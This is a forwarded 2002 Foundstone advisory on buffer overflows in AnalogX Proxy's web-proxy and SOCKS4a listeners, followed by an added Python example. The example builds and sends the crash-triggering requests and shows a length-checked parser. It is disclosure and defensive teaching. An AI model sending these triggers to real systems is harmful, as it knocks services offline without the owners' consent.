Dave Ahmad
SecurityFocus
www.securityfocus.com

---------- Forwarded message ----------
Return-Path: <labs@foundstone.com>
Delivered-To: da@securityfocus.com
Received: (qmail 13630 invoked from network); 1 Jul 2002 21:32:14 -0000
Received: from unknown (HELO mission.foundstone.com) (66.192.0.2)
  by mail.securityfocus.com with SMTP; 1 Jul 2002 21:32:14 -0000
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
Date: Mon, 1 Jul 2002 14:37:44 -0700
Message-ID: <9DC8A3D37E31E043BD516142594BDDFAC47577@MISSION.foundstone.com>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
Thread-Index: AcIhR4n3TkCXBJz4TAqNDSFSrIolUg==
From: "Foundstone Labs" <labs@foundstone.com>
To: <da@securityfocus.com>

----------------------------------------------------------------------
FS Advisory ID:       FS-070102-23-AXPR
Release Date:         July 1st, 2002
Product:              AnalogX Proxy
Vendor:               AnalogX (http://www.analogx.com)
Vendor Advisory:      See vendor web site
Type:                 Buffer Overflow
Severity:             High
Author:               Robin Keir (robin.keir@foundstone.com)
                      Foundstone, Inc. (http://www.foundstone.com)
Operating Systems:    Windows variants
Vulnerable versions:  Proxy v4.07 and previous
Foundstone Advisory:  http://www.foundstone.com/advisories.htm
---------------------------------------------------------------------

Description

A buffer overflow exists in AnalogX's Proxy software. Exploitation of this
vulnerability allows remote execution of arbitrary code with the privileges
of the Proxy daemon.

Details

Web Proxy overflow

Sending an HTTP proxy request to the target system on TCP port 6588
consisting of a single space character, followed by 320 or more non-space
characters, followed by two carriage-return/linefeed pairs causes a read
access violation in the application.

Manually dismissing the application error message box that is displayed on
the affected system at this point terminates the process. If the message
box is not dismissed, repeatedly sending the request causes further access
violation message boxes to appear on the affected system until the service
no longer responds. Different request lengths produce different error
conditions, such as write access violations and Watcom memory error
dialogs.

SOCKS4a buffer overflow

Sending a SOCKS4a request to the target system on TCP port 1080 with a
hostname field of 140 or more characters causes a write access violation
application error. Manually dismissing the application error message box
that is displayed on the affected system at this point terminates the
process. If the message box is not dismissed, repeatedly sending the
request causes further access violation message boxes to appear on the
affected system until the service no longer responds.

An example TCP packet to send is

  \x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00

where each '\xXX' signifies the byte with that hexadecimal value and '#'
is substituted with a DNS name of 140 or more characters.

Solution:

Refer to the vendor's web site for further details: http://www.analogx.com

Credits:

Foundstone would like to thank AnalogX for their prompt response and
handling of this problem.

Disclaimer:

The information contained in this advisory is copyright (c) 2002
Foundstone, Inc. and is believed to be accurate at the time of publishing,
but no representation of any warranty is given, express or implied, as to
its accuracy or completeness. In no event shall the author or Foundstone be
liable for any direct, indirect, incidental, special, exemplary or
consequential damages resulting from the use or misuse of this information.
This advisory may be redistributed, provided that no fee is assigned and that the advisory is not modified in any way.
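The two trigger conditions in the Details section above, worked through as an added example that is not part of the Foundstone advisory and not AnalogX code. It builds the web-proxy request (one space, 320 or more non-space bytes, two CRLFs) and the SOCKS4a request with an oversized hostname, reproduces the advisory's own byte string verbatim, and pairs them with a bounds-checked SOCKS4a parser of the kind a proxy should have used. The byte layouts follow the advisory text and the SOCKS4a wire format; the target host in `send_trigger`, the `max_hostname` limits and the sample hostname are assumptions constructed for illustration.

```python
# Added example; not code from the Foundstone advisory or from AnalogX.
# Builds the malformed requests the advisory describes and shows a
# length-checked SOCKS4a parser. Target hosts and parser limits are
# assumptions chosen for illustration.
import socket
import struct

PROXY_PORT = 6588   # AnalogX web-proxy listener, per the advisory
SOCKS_PORT = 1080   # AnalogX SOCKS4a listener, per the advisory


def http_proxy_trigger(count=320, filler=b"A"):
    """Web-proxy request the advisory says causes a read access violation:
    one space, 'count' (>= 320) non-space bytes, then two CRLFs."""
    if count < 320 or len(filler) != 1 or filler.isspace():
        raise ValueError("advisory trigger needs >= 320 non-space bytes")
    return b" " + filler * count + b"\r\n\r\n"


def socks4a_request(hostname, dst_port=80, userid=b"", ip_marker=1):
    """Generic SOCKS4a CONNECT: VN=4, CD=1, DSTPORT, DSTIP=0.0.0.x (x != 0
    tells the server a hostname follows), USERID NUL, HOSTNAME NUL."""
    if isinstance(hostname, str):
        hostname = hostname.encode("ascii")
    if not 0 < ip_marker < 256:
        raise ValueError("SOCKS4a needs DSTIP of the form 0.0.0.x, x != 0")
    header = struct.pack("!BBH4s", 4, 1, dst_port, bytes([0, 0, 0, ip_marker]))
    return header + userid + b"\x00" + hostname + b"\x00"


def advisory_socks4a_packet(hostname):
    """The advisory's byte string with '#' replaced by the hostname. Read as
    SOCKS4a, its seventh byte is 'a' (0x61), so DSTIP is 0.0.0.97 and the
    userid is 'bcd'; either way the server sees a hostname field."""
    if isinstance(hostname, str):
        hostname = hostname.encode("ascii")
    return b"\x04\x01\x04\x38\x00\x00\x00abcd\x00" + hostname + b"\x00"


def parse_socks4a(data, max_hostname=253):
    """Bounds-checked SOCKS4 / SOCKS4a parse. Rejects short headers, missing
    NUL terminators and hostnames longer than max_hostname. 253 is the DNS
    limit; a server that copies the name into a smaller fixed buffer must
    pass that buffer's size here, which is the check the advisory implies
    was missing."""
    if len(data) < 8:
        raise ValueError("short header")
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    if vn != 4 or cd not in (1, 2):
        raise ValueError("not a SOCKS4 CONNECT/BIND")
    rest = data[8:]
    nul = rest.find(b"\x00")
    if nul < 0:
        raise ValueError("userid not terminated")
    userid, rest = rest[:nul], rest[nul + 1:]
    hostname = None
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:      # SOCKS4a marker
        nul = rest.find(b"\x00")
        if nul < 0:
            raise ValueError("hostname not terminated")
        hostname = rest[:nul]
        if len(hostname) > max_hostname:
            raise ValueError("hostname of %d bytes exceeds limit %d"
                             % (len(hostname), max_hostname))
    return {"cmd": cd, "port": port, "ip": socket.inet_ntoa(ip),
            "userid": userid, "hostname": hostname}


def accepts(data, max_hostname=253):
    """True if parse_socks4a would accept the request."""
    try:
        parse_socks4a(data, max_hostname)
        return True
    except ValueError:
        return False


def send_trigger(host, port, payload, timeout=3.0):
    """Deliver one payload to a host you are authorised to test and return
    whatever the listener answers (None on timeout/reset). After a crash
    the next attempt fails to connect or is reset."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            return s.recv(64)
        except (socket.timeout, ConnectionResetError):
            return None


if __name__ == "__main__":
    long_name = "x" * 140                       # constructed: >= 140 chars
    print(len(http_proxy_trigger()), "bytes of web-proxy trigger")
    pkt = advisory_socks4a_packet(long_name)
    print(len(pkt), "bytes of SOCKS4a trigger")
    print("DNS-limit parser accepts it:", accepts(pkt))
    print("128-byte-buffer parser accepts it:", accepts(pkt, 128))
```

Note that a 140-character hostname is legal by DNS rules, so a parser that only enforces the 253-byte DNS limit still passes the advisory's trigger through; the bound that matters is the size of the buffer the name is actually copied into.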